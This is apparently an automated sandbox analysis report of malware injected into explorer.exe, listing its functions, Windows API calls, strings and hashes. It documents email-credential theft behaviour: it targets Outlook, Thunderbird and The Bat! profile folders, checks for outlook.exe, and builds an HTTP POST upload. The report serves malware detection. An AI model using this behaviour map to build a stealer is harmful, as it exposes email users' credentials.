MultiByteToWideChar 842->877 844 8020e3 878 8024cc RtlZeroMemory 844->878 847 802135 RtlZeroMemory 849 80216a 847->849 848 802999 3 API calls 850 80208a 848->850 853 8023f7 849->853 855 802198 849->855 880 80243d 849->880 850->835 852 8023dd 852->853 854 802999 3 API calls 852->854 853->848 854->853 855->852 889 8029b7 GetProcessHeap RtlAllocateHeap 855->889 857 802268 wsprintfW 858 80228e 857->858 862 8022fb 858->862 890 8029b7 GetProcessHeap RtlAllocateHeap 858->890 860 8022c8 wsprintfW 860->862 861 8023ba 863 802999 3 API calls 861->863 862->861 891 8029b7 GetProcessHeap RtlAllocateHeap 862->891 865 8023ce 863->865 865->852 866 802999 3 API calls 865->866 866->852 867 8023b3 870 802999 3 API calls 867->870 868 802346 868->867 892 80296b VirtualAlloc 868->892 870->861 871 8023a0 RtlMoveMemory 871->867 873 80241f 872->873 875 8020c6 872->875 893 802818 lstrlen lstrlen 873->893 876 8029b7 GetProcessHeap RtlAllocateHeap 875->876 876->842 877->844 879 8020f3 878->879 879->847 879->853 882 80244a 880->882 883 8024ab 880->883 881 80244e DnsQuery_W 881->882 882->881 882->883 884 80248d DnsFree inet_ntoa 882->884 883->855 884->882 885 8024ad 884->885 895 8029b7 GetProcessHeap RtlAllocateHeap 885->895 887 8024b7 896 802938 lstrlen MultiByteToWideChar 887->896 889->857 890->860 891->868 892->871 894 802839 893->894 894->875 895->887 896->883 792 809d24 794 809caf 792->794 793 809f00 VirtualProtect VirtualProtect 795 809ec9 793->795 794->793 794->795 811 8018f4 CreateFileW 812 801919 GetFileSize 811->812 813 80196d 811->813 814 801965 CloseHandle 812->814 815 801929 812->815 814->813 815->814 821 8029b7 GetProcessHeap RtlAllocateHeap 815->821 817 801936 ReadFile 820 80194b 817->820 818 802999 3 API calls 819 801964 818->819 819->814 820->818 821->817 915 801e44 916 801e5b lstrlen CharLowerBuffA 915->916 923 801eb3 915->923 917 801e75 916->917 918 801e9d 916->918 917->918 919 801e7f lstrcmpiA 917->919 922 801ece 8 API calls 918->922 918->923 919->917 919->923 920 8026a9 921 802692 lstrlen RtlMoveMemory 921->920 922->923 923->920 923->921 822 809cf6 824 809caf 822->824 823 809f00 VirtualProtect VirtualProtect 825 809ec9 823->825 824->822 824->823 824->825 897 802917 lstrlenW WideCharToMultiByte 804 8026ac lstrlen 805 8026f3 804->805 806 8026c4 CryptBinaryToStringA 804->806 806->805 807 8026d7 806->807 810 8029b7 GetProcessHeap RtlAllocateHeap 807->810 809 8026e2 CryptBinaryToStringA 809->805 810->809 924 80295c VirtualFree 898 801e3e 899 801e5b lstrlen CharLowerBuffA 898->899 902 801eb3 898->902 903 801e75 899->903 905 801e9d 899->905 900 801e7f lstrcmpiA 900->902 900->903 901 8026a9 902->901 904 802692 lstrlen RtlMoveMemory 902->904 903->900 903->905 904->901 905->902 907 801ece StrStrIA 905->907 908 801ef5 RtlMoveMemory RtlMoveMemory StrStrIA 907->908 909 801eee 907->909 908->909 910 801f37 StrStrIA 908->910 909->902 910->909 911 801f4a StrStrIA 910->911 911->909 912 801f5d lstrlen 911->912 912->909 913 801f6a 912->913 913->909 914 801f9b lstrlen 913->914 914->909 914->913 796 80118f 797 801192 796->797 798 80255c 16 API calls 797->798 799 8011ac 798->799 800 80255c 16 API calls 799->800 801 8011b9 800->801 802 80255c 16 API calls 801->802 803 8011c6 802->803

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 0080255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88stringfileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?,008018F4), ref: 00802588
                                                                                                                                                      • PathAppendW.SHLWAPI(00000000,*.*,?,008018F4), ref: 00802594
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,008018F4), ref: 008025A8
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000209,00000209), ref: 008025C3
                                                                                                                                                      • lstrcatW.KERNEL32(00000209,?,?,008018F4), ref: 008025E1
                                                                                                                                                      • PathAppendW.SHLWAPI(00000209,?,?,008018F4), ref: 008025ED
                                                                                                                                                      • lstrcatW.KERNEL32(00000209,?,?,008018F4), ref: 00802611
                                                                                                                                                      • PathAppendW.SHLWAPI(00000209,?,?,008018F4), ref: 0080261D
                                                                                                                                                      • StrStrIW.SHLWAPI(00000209,?,?,008018F4), ref: 0080262C
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,?,?,008018F4), ref: 00802644
                                                                                                                                                      • FindClose.KERNELBASE(00000000,?,008018F4), ref: 00802653
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1648349226-438819550
                                                                                                                                                      • Opcode ID: b0e92d0298cca5e29868751aed60ed32beed128ff11488df8835b9b4321ddb1f
                                                                                                                                                      • Instruction ID: 1b11ce95a01361ff35aa3f44e2cfdfa87dd757df80ec17275f522057356d469b
                                                                                                                                                      • Opcode Fuzzy Hash: b0e92d0298cca5e29868751aed60ed32beed128ff11488df8835b9b4321ddb1f
                                                                                                                                                      • Instruction Fuzzy Hash: 6221D071205705AFD790AF249D4CE6FBBACFF95700F00041CFA61D2191DBBA8A068BA6
                                                                                                                                                      Function 0080274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36processstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00802758
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00802777
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0080278B
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 008027A8
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 008027B3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                      • String ID: outlook.exe
                                                                                                                                                      • API String ID: 868014591-749849299
                                                                                                                                                      • Opcode ID: 33abd5b2b3e1621d1866d0983525834498ff4ea11dd5888d5b5b6f8900d9e7cd
                                                                                                                                                      • Instruction ID: 8c2497efd3603b9e6406fb2765235cc6447695c4123abe9db80dde689b6b223e
                                                                                                                                                      • Opcode Fuzzy Hash: 33abd5b2b3e1621d1866d0983525834498ff4ea11dd5888d5b5b6f8900d9e7cd
                                                                                                                                                      • Instruction Fuzzy Hash: A0F09631502528ABE7A0AB74DC4DFEE777CFB08721F000190F959E21D0DB748F544A91
                                                                                                                                                      Function 00801016 Relevance: 3.0, APIs: 2, Instructions: 19nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008027E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00802664,?,008018F4), ref: 008027EF
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0080103A
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00801043
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                                      • Opcode ID: cd32a9c5d255599d1b9f432f2d7f47a5088a165c7d6dcad8017fb4f23aab2cda
                                                                                                                                                      • Instruction ID: ff862849ff91afa9f99a15a703453079dccb47719cb5974938e3bd710379aec4
                                                                                                                                                      • Opcode Fuzzy Hash: cd32a9c5d255599d1b9f432f2d7f47a5088a165c7d6dcad8017fb4f23aab2cda
                                                                                                                                                      • Instruction Fuzzy Hash: BAD05E32801660ABDEE477B8BC5E9CA2A4CFF46330B244211B565D21D2C9754A8083B1
                                                                                                                                                      Function 0080104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 0080107F
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 00801093
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010A7
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0080104E,?,00801010), ref: 008010BB
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010D3
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010E7
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 008010FB
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 0080110F
                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0080104E,?,00801010), ref: 00801123
                                                                                                                                                      • wsprintfA.USER32 ref: 0080116B
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00801189
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                                                                                                                      • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                                                                                                                      • API String ID: 1709485025-1688604020
                                                                                                                                                      • Opcode ID: a6616649fc63c2593016b3fa55d03fbb777e175849487f8795f13593db8e7f13
                                                                                                                                                      • Instruction ID: 169739c34ee3bdb5dc8747a43b9d722f7d965f35badb0c44d8dc423e229de687
                                                                                                                                                      • Opcode Fuzzy Hash: a6616649fc63c2593016b3fa55d03fbb777e175849487f8795f13593db8e7f13
                                                                                                                                                      • Instruction Fuzzy Hash: 4631B1613416256AEFE9336A4C4EF7F284DFF91BA0B050124B655DA3C2DE588E0186F6
                                                                                                                                                      Function 00809CF6 Relevance: 3.3, APIs: 2, Instructions: 282COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 82 809cf6-809d10 83 809d15 82->83 84 809d16-809d28 83->84 86 809d2a 84->86 87 809d8e-809d8f 84->87 88 809d2c-809d36 86->88 89 809caf-809cbd 86->89 90 809d90-809d95 87->90 88->83 91 809d38-809d43 88->91 92 809cd1-809cf4 89->92 93 809cbf-809cce 89->93 94 809d96-809d98 90->94 95 809d44-809d4c 91->95 92->82 93->92 96 809da1 94->96 97 809d9a-809d9f 94->97 95->95 99 809d4e-809d50 95->99 96->90 98 809da3 96->98 97->96 100 809da8-809daa 98->100 101 809d52-809d55 99->101 102 809d79-809d88 99->102 103 809db3-809db7 100->103 104 809dac-809db1 100->104 101->84 105 809d57-809d75 101->105 102->97 103->100 106 809db9 103->106 104->103 105->102 107 809f3d 105->107 108 809dc4-809dc9 106->108 109 809dbb-809dc2 106->109 107->107 110 809dd8-809dda 108->110 111 809dcb-809dd4 108->111 109->100 109->108 114 809de3-809de7 110->114 115 809ddc-809de1 110->115 112 809dd6 111->112 113 809e4a-809e4d 111->113 112->110 116 809e52-809e55 113->116 117 809df0-809df2 114->117 118 809de9-809dee 114->118 115->114 119 809e57-809e59 116->119 120 809e14-809e23 117->120 121 809df4 117->121 118->117 119->116 125 809e5b-809e5e 119->125 123 809e34-809e41 120->123 124 809e25-809e2c 120->124 122 809df5-809df7 121->122 126 809e00-809e04 122->126 127 809df9-809dfe 122->127 123->123 129 809e43-809e45 123->129 124->124 128 809e2e 124->128 125->116 130 809e60-809e7c 125->130 126->122 132 809e06 126->132 127->126 128->94 129->94 130->119 131 809e7e 130->131 133 809e84-809e88 131->133 134 809e11 132->134 135 809e08-809e0f 132->135 136 809e8a-809ea0 133->136 137 809ecf-809ed2 133->137 134->120 135->122 135->134 145 809ea1-809ea6 136->145 138 809ed5-809edc 137->138 140 809f00-809f30 VirtualProtect * 2 138->140 141 809ede-809ee0 138->141 144 809f34-809f38 140->144 142 809ee2-809ef1 141->142 143 809ef3-809efe 141->143 142->138 143->142 144->144 146 809f3a 144->146 145->133 147 809ea8-809eaa 145->147 146->107 148 809eb3-809ec0 147->148 149 809eac-809eb2 147->149 151 809ec2-809ec7 148->151 152 809ec9-809ecc 148->152 149->148 151->145
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000808000.00000040.80000000.00040000.00000000.sdmp, Offset: 00808000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_808000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4ccd18aab7fae9d96f56d124f485a5d841d2ec720aad4e6d3483c55a10e5ffe6
                                                                                                                                                      • Instruction ID: 57cafcb6326af2325c755e812becbafe64cdd29a24cc4e127541619f6b7be823
                                                                                                                                                      • Opcode Fuzzy Hash: 4ccd18aab7fae9d96f56d124f485a5d841d2ec720aad4e6d3483c55a10e5ffe6
                                                                                                                                                      • Instruction Fuzzy Hash: F9915B725493924FE7629E74CCC06B1BBA0FB53324B2C06A9D9D1CB2D3E7A45C06C760
                                                                                                                                                      Function 008029B7 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 162 8029b7-8029c7 GetProcessHeap RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                                      • Opcode ID: 4ddd9079a0dc81a918d7fd91f83375f3a8953dfc185da8e4498712faf6a700f1
                                                                                                                                                      • Instruction ID: 386d4f8ac558541ee40770dbfe362448a103bbd61f911f90a91dea5d4ef62f1b
                                                                                                                                                      • Opcode Fuzzy Hash: 4ddd9079a0dc81a918d7fd91f83375f3a8953dfc185da8e4498712faf6a700f1
                                                                                                                                                      • Instruction Fuzzy Hash: 67A002B1A516005BDD8457B6AE0DA15752CB754701F004544734585064996456048721

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 008020A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 170 8020a7-802102 call 802415 call 8029b7 call 802938 call 8024cc 179 802104-80211b 170->179 180 80211d-802129 170->180 183 80212d-80212f 179->183 180->183 184 802403-802412 call 802999 183->184 185 802135-80216c RtlZeroMemory 183->185 189 802172-80218d 185->189 190 8023fb-802402 185->190 191 8021bf-8021d1 189->191 192 80218f-8021a0 call 80243d 189->192 190->184 197 8021d5-8021d7 191->197 198 8021a2-8021b1 192->198 199 8021b3 192->199 201 8023e8-8023ee 197->201 202 8021dd-802239 call 802866 197->202 200 8021b5-8021bd 198->200 199->200 200->197 203 8023f0-8023f2 call 802999 201->203 204 8023f7 201->204 210 8023e1 202->210 211 80223f-802244 202->211 203->204 204->190 210->201 212 802246-802257 211->212 213 80225e-80228c call 8029b7 wsprintfW 211->213 212->213 216 8022a5-8022bc 213->216 217 80228e-802290 213->217 223 8022fb-802315 216->223 224 8022be-8022f4 call 8029b7 wsprintfW 216->224 218 802291-802294 217->218 219 802296-80229b 218->219 220 80229f-8022a1 218->220 219->218 222 80229d 219->222 220->216 222->216 228 80231b-80232e 223->228 229 8023be-8023d4 call 802999 223->229 224->223 228->229 232 802334-80234a call 8029b7 228->232 237 8023d6-8023d8 call 802999 229->237 238 8023dd 229->238 239 80234c-802357 232->239 237->238 238->210 241 802359-802366 call 80297c 239->241 242 80236b-802382 239->242 241->242 246 802384 242->246 247 802386-802393 242->247 246->247 247->239 248 802395-802399 247->248 249 8023b3-8023ba call 802999 248->249 250 80239b 248->250 249->229 251 80239b call 80296b 250->251 253 8023a0-8023ad RtlMoveMemory 251->253 253->249
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008029B7: GetProcessHeap.KERNEL32(00000008,00000412,0080257A,008018F4), ref: 008029BA
                                                                                                                                                        • Part of subcall function 008029B7: RtlAllocateHeap.NTDLL(00000000), ref: 008029C1
                                                                                                                                                        • Part of subcall function 00802938: lstrlen.KERNEL32(00B06136,?,00000000,00000000,008020E3,771A8A60,00B06136,00000000), ref: 00802940
                                                                                                                                                        • Part of subcall function 00802938: MultiByteToWideChar.KERNEL32(00000000,00000000,00B06136,00000001,00000000,00000000), ref: 00802952
                                                                                                                                                        • Part of subcall function 008024CC: RtlZeroMemory.NTDLL(?,00000018), ref: 008024DE
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 0080213F
                                                                                                                                                      • wsprintfW.USER32 ref: 00802278
                                                                                                                                                      • wsprintfW.USER32 ref: 008022E3
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 008023AD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                                      • Opcode ID: f984f26bc6e5406dcdbb03ae070f105cb658f1917561742850d124ceda59d0bf
                                                                                                                                                      • Instruction ID: 1b1cc955bbc1fdd681ba474494db7864d373851b8c5c78531d115c2e75d05c67
                                                                                                                                                      • Opcode Fuzzy Hash: f984f26bc6e5406dcdbb03ae070f105cb658f1917561742850d124ceda59d0bf
                                                                                                                                                      • Instruction Fuzzy Hash: 1AA15971609344AFD791DF68DC88A2BBBE8FB88344F00492DF585D33A1DAB4DA048B52
                                                                                                                                                      Function 00801ECE Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 255 801ece-801eec StrStrIA 256 801ef5-801f35 RtlMoveMemory * 2 StrStrIA 255->256 257 801eee-801ef0 255->257 259 801fa7 256->259 260 801f37-801f48 StrStrIA 256->260 258 801fab-801fb3 257->258 262 801fa9-801faa 259->262 260->259 261 801f4a-801f5b StrStrIA 260->261 261->259 263 801f5d-801f68 lstrlen 261->263 262->258 264 801fa3-801fa5 263->264 265 801f6a 263->265 264->262 266 801f6c-801f78 call 801ffb 265->266 269 801f7a-801f80 266->269 270 801f9b-801fa1 lstrlen 266->270 271 801f82-801f85 269->271 272 801f87-801f8a 269->272 270->264 270->266 271->270 271->272 272->270 273 801f8c-801f8f 272->273 273->270 274 801f91-801f94 273->274 274->270 275 801f96-801f99 274->275 275->259 275->270
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIA.SHLWAPI(?,008031D8,00000000,00B064D8), ref: 00801EE4
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,00000000), ref: 00801F08
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,00000100), ref: 00801F22
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00801F31
                                                                                                                                                      • StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 00801F44
                                                                                                                                                      • StrStrIA.SHLWAPI(?,?,?,00000000), ref: 00801F57
                                                                                                                                                      • lstrlen.KERNEL32(?,?,00000000), ref: 00801F64
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,00000000), ref: 00801F9D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryMovelstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 456560858-0
                                                                                                                                                      • Opcode ID: ee7628d7b6dea6248fc5e6fed44f3e3f3d0d4028e6af5b8ea3a0ce13d1e6ca1b
                                                                                                                                                      • Instruction ID: 96be4158649dcbde9ac2b9736867f1dbba7616e2de78704238af7758a7b3bf95
                                                                                                                                                      • Opcode Fuzzy Hash: ee7628d7b6dea6248fc5e6fed44f3e3f3d0d4028e6af5b8ea3a0ce13d1e6ca1b
                                                                                                                                                      • Instruction Fuzzy Hash: 1321C8B250430A69EF70EA64EC89EEB77DCFF45364F400926F940C3191DF29D94987A2
                                                                                                                                                      Function 00801E44 Relevance: 7.6, APIs: 5, Instructions: 81stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 291 801e44-801e59 292 801ec8-801ecd 291->292 293 801e5b-801e73 lstrlen CharLowerBuffA 291->293 294 802671-80267d 292->294 295 801e75-801e7b 293->295 296 801e9d-801eaa call 8026fc 293->296 299 8026a9-8026ab 294->299 300 80267f-802688 294->300 297 801e7f-801e89 lstrcmpiA 295->297 301 801ec7 296->301 306 801eac-801eb5 call 801ece 296->306 297->301 302 801e8b-801e9b 297->302 304 802692-8026a8 lstrlen RtlMoveMemory 300->304 305 80268a-802690 300->305 301->292 302->296 302->297 304->299 305->304 306->301 309 801eb7-801ec2 306->309 309->294
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,00801BF4), ref: 00801E5D
                                                                                                                                                      • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00801BF4), ref: 00801E69
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,00B0747C), ref: 00801E81
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 00802699
                                                                                                                                                      • RtlMoveMemory.NTDLL(00B0747C,?,00000000), ref: 008026A2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2826435453-0
                                                                                                                                                      • Opcode ID: d40a633f86665a38dc49eac4515f27dc8f206e31c964242c74eecaef273c8abe
                                                                                                                                                      • Instruction ID: cc24ad1c42c27f6a3c8d0685301b7b69fea59bd4e4c404e058cb954898792c7e
                                                                                                                                                      • Opcode Fuzzy Hash: d40a633f86665a38dc49eac4515f27dc8f206e31c964242c74eecaef273c8abe
                                                                                                                                                      • Instruction Fuzzy Hash: 04210BB2B016105FD7509F58EC889BE779DFF89321B10042AFC15C7281D7729D0687A2
                                                                                                                                                      Function 00801E3E Relevance: 7.6, APIs: 5, Instructions: 76stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 310 801e3e-801e59 311 801ec8-801ecd 310->311 312 801e5b-801e73 lstrlen CharLowerBuffA 310->312 313 802671-80267d 311->313 314 801e75-801e7b 312->314 315 801e9d-801eaa call 8026fc 312->315 318 8026a9-8026ab 313->318 319 80267f-802688 313->319 316 801e7f-801e89 lstrcmpiA 314->316 320 801ec7 315->320 325 801eac-801eb5 call 801ece 315->325 316->320 321 801e8b-801e9b 316->321 323 802692-8026a8 lstrlen RtlMoveMemory 319->323 324 80268a-802690 319->324 320->311 321->315 321->316 323->318 324->323 325->320 328 801eb7-801ec2 325->328 328->313
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,00801BF4), ref: 00801E5D
                                                                                                                                                      • CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,00801BF4), ref: 00801E69
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,00B0747C), ref: 00801E81
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 00802699
                                                                                                                                                      • RtlMoveMemory.NTDLL(00B0747C,?,00000000), ref: 008026A2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.1746302421.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_801000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2826435453-0
                                                                                                                                                      • Opcode ID: d4b5c7ebeba06605251f4e4468ba582d6796be762d1de8e9083b60c34e49e059
                                                                                                                                                      • Instruction ID: 6d729b97d8630c8d32fda652d91e1382a92f8bbd7ad2abc6fa1233b98378a8e1
                                                                                                                                                      • Opcode Fuzzy Hash: d4b5c7ebeba06605251f4e4468ba582d6796be762d1de8e9083b60c34e49e059
                                                                                                                                                      • Instruction Fuzzy Hash: 7C21F672A016105FDB90CF68EC8896E77EDFF8A320B000469EC54D7281C77199068BA2
                                                                                                                                                      Function 008018F4 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
